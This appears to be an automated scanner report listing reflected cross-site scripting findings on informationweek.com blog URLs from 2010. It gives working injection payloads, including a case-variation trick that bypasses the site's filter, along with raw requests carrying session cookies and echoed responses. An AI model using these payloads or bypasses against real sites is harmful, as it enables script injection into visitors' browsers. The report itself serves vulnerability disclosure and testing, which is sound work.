The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a2ffa'-alert(1)-'e38f30dda99 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/maina2ffa'-alert(1)-'e38f30dda99/archives/global_cio/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:20:44 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:44 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 64685
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 210a8"><script>alert(1)</script>b058815550b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/main210a8"><script>alert(1)</script>b058815550b/archives/global_cio/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:20:42 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:42 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 64739
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95287"style%3d"x%3aexpression(alert(1))"69b37b210ec was submitted in the REST URL parameter 3. This input was echoed as 95287"style="x:expression(alert(1))"69b37b210ec in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /blog/main/95287"style%3d"x%3aexpression(alert(1))"69b37b210ec/global_cio/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:48 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:48 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 63694
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main/95287"style="x:expression(alert(1))"69b37b210ec/;kvarticleid=;kvauthor=;loc=300;grp=65927827" target="_blank"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 526b0'-alert(1)-'d2a8dc87bf7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/526b0'-alert(1)-'d2a8dc87bf7/global_cio/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:50 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:50 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 63570
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main/526b0'-alert(1)-'d2a8dc87bf7/global_cio/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=414702705;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89363</script>70502110f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/archives/89363</script>70502110f/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:58 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:58 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 58583
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/89363</script>70502110f/index;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=327372367;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b38d"><ScRiPt>alert(1)</ScRiPt>ee21f17714c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /blog/main/archives/6b38d"><ScRiPt>alert(1)</ScRiPt>ee21f17714c/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:20:54 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:20:54 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59299
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/6b38d"><ScRiPt>alert(1)</ScRiPt>ee21f17714c/index;kvarticleid=;kvauthor=;loc=300;grp=242682339" target="_blank"> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3455d'-alert(1)-'008d863933e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/archives/global_cio/index.html3455d'-alert(1)-'008d863933e HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:09 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:09 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59524
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/global_cio/index3455d'-alert(1)-'008d863933e;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=833671974;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90a06"><a%20b%3dc>9b2737e8d0f was submitted in the REST URL parameter 5. This input was echoed as 90a06"><a b=c>9b2737e8d0f in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/main/archives/global_cio/index.html90a06"><a%20b%3dc>9b2737e8d0f HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:05 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:05 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59439
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/global_cio/index90a06"><a b=c>9b2737e8d0f;kvarticleid=;kvauthor=;loc=300;grp=125733997" target="_blank"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c38a</script>6a9657b6156 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /7c38a</script>6a9657b6156/main/archives/microsoft/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:11 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:11 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31301
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main//7c38a</script>6a9657b6156/main/archives/microso;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=170017236;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f522e"><script>alert(1)</script>65cd5d997e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /f522e"><script>alert(1)</script>65cd5d997e/main/archives/microsoft/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:09 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:09 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 31369
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main//f522e"><script>alert(1)</script>65cd5d997e/main;kvarticleid=;kvauthor=;loc=300;grp=823668502" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea91d"><script>alert(1)</script>3491c520b46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/ea91d"><script>alert(1)</script>3491c520b46/archives/microsoft/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:15 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:15 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 64663
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5a15</script><a%20b%3dc>6d62dbe71bd was submitted in the REST URL parameter 3. This input was echoed as e5a15</script><a b=c>6d62dbe71bd in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/archivese5a15</script><a%20b%3dc>6d62dbe71bd/microsoft/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:31 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:31 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 63711
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main/archivese5a15</script><a b=c>6d62dbe71bd/microso;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=610646342;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc4d4"%20a%3db%20e7c5a9f106a was submitted in the REST URL parameter 3. This input was echoed as cc4d4" a=b e7c5a9f106a in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/main/archivescc4d4"%20a%3db%20e7c5a9f106a/microsoft/index.html HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:23 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:23 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 63580
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=InformationWeek_Blog_HP_Welcome_Ad_1x1;key=bloghp+/blog/main/archivescc4d4" a=b e7c5a9f106a/microsoft/index;kvarticleid=;kvauthor=;loc=300;grp=61409625" target="_blank"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f56ae"><a>786f20881d8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /blog/main/archives/microsoft/index.htmlf56ae"><a>786f20881d8 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:42 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:42 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59260
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you reque ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=archives/microsoft/indexf56ae"><a>786f20881d8;kvarticleid=;kvauthor=;loc=300;grp=429014916" target="_blank"> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62402</script><a%20b%3dc>e2298a1ea0c was submitted in the REST URL parameter 5. This input was echoed as 62402</script><a b=c>e2298a1ea0c in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/main/archives/microsoft/index.html62402</script><a%20b%3dc>e2298a1ea0c HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:54 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:54 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 59649
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
